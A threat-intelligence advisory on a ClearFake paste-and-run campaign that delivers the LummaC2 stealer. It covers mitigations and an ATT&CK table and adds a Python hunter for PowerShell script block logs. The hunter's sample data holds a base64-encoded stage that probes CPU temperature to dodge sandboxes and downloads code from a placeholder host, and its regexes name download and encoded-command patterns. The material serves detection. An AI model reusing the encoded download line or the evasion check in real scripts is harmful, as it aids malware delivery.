EXECUTIVE SUMMARY:
A new campaign using the malicious JavaScript framework "ClearFake" has been observed employing a novel execution technique that deceives users into running malicious PowerShell code themselves. Unlike a traditional drive-by download, where the victim is tricked into downloading and opening a malicious payload, this campaign uses social engineering to get the victim to copy obfuscated code from the web page and paste it directly into a PowerShell terminal. The approach is designed to slip past security tooling: no script file is downloaded or written to disk for an endpoint scanner to inspect, and the malicious commands are executed interactively by the user rather than by a process launched from a downloaded file.
The attack begins when a user visits a compromised website that displays a fake browser error message, claiming the page cannot be shown correctly until a root certificate is installed. Clicking the "Fix it" button presents instructions for copying obfuscated PowerShell code to the clipboard and running it in a PowerShell terminal. The pasted script then performs several actions: it clears the DNS cache, displays a "success" message box, downloads further PowerShell code from an attacker-controlled domain, and ultimately installs the LummaC2 information stealer through a series of base64-encoded commands interleaved with sandbox-evasion checks. Notably, the script checks the user agent and queries the CPU temperature to avoid running in virtualized environments: most hypervisors expose no ACPI thermal data to the guest, so an absent reading is treated as a sign that the script is being analysed rather than run on a real victim machine.
To mitigate this threat, organizations should implement robust application control policies that restrict PowerShell usage to the personnel who need it. It is crucial to educate users about the risks of pasting code from untrusted sources into a console, and to strengthen network defenses by blocking access to suspicious domains. Configuring Windows Defender Application Control (WDAC) so that PowerShell runs in constrained language mode limits what a pasted script can do (for example, the Windows Forms call used to display the message box is not available in that mode), and ensuring endpoint security tools are integrated with the Windows Antimalware Scan Interface (AMSI) lets them inspect script content at execution time even when it never touches disk. Enabling PowerShell script block logging (Event ID 4104) and forwarding it to the SIEM is equally important, since it is the only place a pasted command is recorded in full. By adopting these practices, organizations can materially reduce the risk posed by this emerging threat and protect their environments against similar paste-and-run attacks.
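The detection logic below is an added example, not code from the report, from ClearFake, or from any vendor product. It scans PowerShell script block log text (the ScriptBlockText of Event ID 4104 records) for the behaviours described in the summary: DNS cache flush, message box, remote download, base64-encoded commands and the CPU temperature probe. Because the chain hides most of its work inside an -EncodedCommand payload, the scanner unwraps base64 layers (UTF-16LE for encoded commands, UTF-8 for FromBase64String blobs) before matching, so indicators in the second stage still count. The WMI class used for the temperature check, the sample records, the record IDs and the placeholder URL are all assumptions constructed for the example.

```python
"""Hunt for the ClearFake paste-and-run chain in PowerShell script block logs.

Scans the ScriptBlockText of Event ID 4104 records for the behaviours the
summary describes and unwraps base64 layers so indicators hidden inside an
-EncodedCommand payload still count. Added example; not ClearFake code and not
a vendor detection. The records below are constructed, not real telemetry.
"""
import base64
import re

# One pattern per behaviour named in the summary. The WMI class named in the
# thermal_probe pattern is an assumption about how a CPU temperature check is
# usually written in PowerShell; it is not taken from the report.
INDICATORS = {
    "dns_cache_flush": re.compile(r"Clear-DnsClientCache|ipconfig(?:\.exe)?\s+/flushdns", re.I),
    "message_box": re.compile(r"MessageBox\]::Show|Interaction\]::MsgBox", re.I),
    "remote_download": re.compile(
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile|Net\.WebClient",
        re.I),
    "encoded_command": re.compile(
        r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|FromBase64String", re.I | re.M),
    "thermal_probe": re.compile(r"MSAcpi_ThermalZoneTemperature", re.I),
}
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
MAX_DEPTH = 3   # layers of nested encoding to unwrap
MIN_SCORE = 3   # distinct behaviours needed before a block is flagged


def _is_text(s):
    """ASCII with only printable characters and whitespace: looks like script."""
    return s.isascii() and all(c.isprintable() or c.isspace() for c in s)


def decode_layers(text, depth=0):
    """Return every base64-decoded string found in text, recursing into each."""
    found = []
    if depth >= MAX_DEPTH:
        return found
    for token in BASE64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:      # not base64 after all (binascii.Error is a ValueError)
            continue
        # -EncodedCommand payloads are UTF-16LE; FromBase64String blobs are
        # usually UTF-8. Try UTF-16LE first: UTF-8 text decoded as UTF-16LE
        # yields non-ASCII characters and is rejected, so the order is safe.
        for encoding in ("utf-16-le", "utf-8"):
            try:
                decoded = raw.decode(encoding)
            except UnicodeDecodeError:
                continue
            if _is_text(decoded):
                found.append(decoded)
                found.extend(decode_layers(decoded, depth + 1))
                break
    return found


def score_block(script_block):
    """Set of behaviours seen in the block or in any decoded layer inside it."""
    hits = set()
    for layer in [script_block] + decode_layers(script_block):
        for name, pattern in INDICATORS.items():
            if pattern.search(layer):
                hits.add(name)
    return hits


def hunt(records, min_score=MIN_SCORE):
    """Return [(record_id, sorted hits)] for records that reach min_score."""
    flagged = []
    for record in records:
        hits = score_block(record["script_block"])
        if len(hits) >= min_score:
            flagged.append((record["record_id"], sorted(hits)))
    return flagged


# Constructed sample records standing in for Event ID 4104 ScriptBlockText.
# The first mimics the chain in the summary: DNS flush, success message box,
# then an encoded stage that probes the thermal zone and fetches more code
# (placeholder URL). The other two are benign admin activity that share one
# indicator each and must not be flagged.
_STAGE_TWO = (
    '$t = Get-WmiObject -Namespace root/wmi -Class MSAcpi_ThermalZoneTemperature\n'
    'if ($t) { iwr -UseBasicParsing "https://stage.example.invalid/next" -UserAgent "Mozilla/5.0" }'
)
_ENCODED = base64.b64encode(_STAGE_TWO.encode("utf-16-le")).decode("ascii")
SAMPLE_RECORDS = [
    {"record_id": 4104001, "script_block":
        "Clear-DnsClientCache\n"
        "[System.Windows.Forms.MessageBox]::Show('Certificate installed')\n"
        "powershell.exe -enc " + _ENCODED},
    {"record_id": 4104002, "script_block":
        "ipconfig /flushdns\nGet-DnsClientCache | Export-Csv C:\\temp\\dns.csv"},
    {"record_id": 4104003, "script_block":
        "$cfg = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($env:APP_CFG))"},
]

if __name__ == "__main__":
    for record_id, hits in hunt(SAMPLE_RECORDS):
        print(f"record {record_id}: {', '.join(hits)}")
```

Scoring on distinct behaviours rather than on any single string keeps a DNS flush or a base64 config decode from paging an analyst on its own, while the full chain scores five out of five. In production the records would come from the SIEM rather than from the constructed list, and the encoded layers should be kept with the alert so the analyst sees the decoded second stage without re-running the decode by hand.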
THREAT PROFILE:
Tactic | Technique ID | Technique
Execution | T1059 | Command and Scripting Interpreter
Persistence | T1547 | Boot or Logon Autostart Execution
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information
Defense Evasion | T1218 | System Binary Proxy Execution
Defense Evasion | T1070 | Indicator Removal
Collection | T1113 | Screen Capture
Command and Control | T1071 | Application Layer Protocol
Exfiltration | T1041 | Exfiltration Over C2 Channel
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/hackers-javascript-framework-trick-users/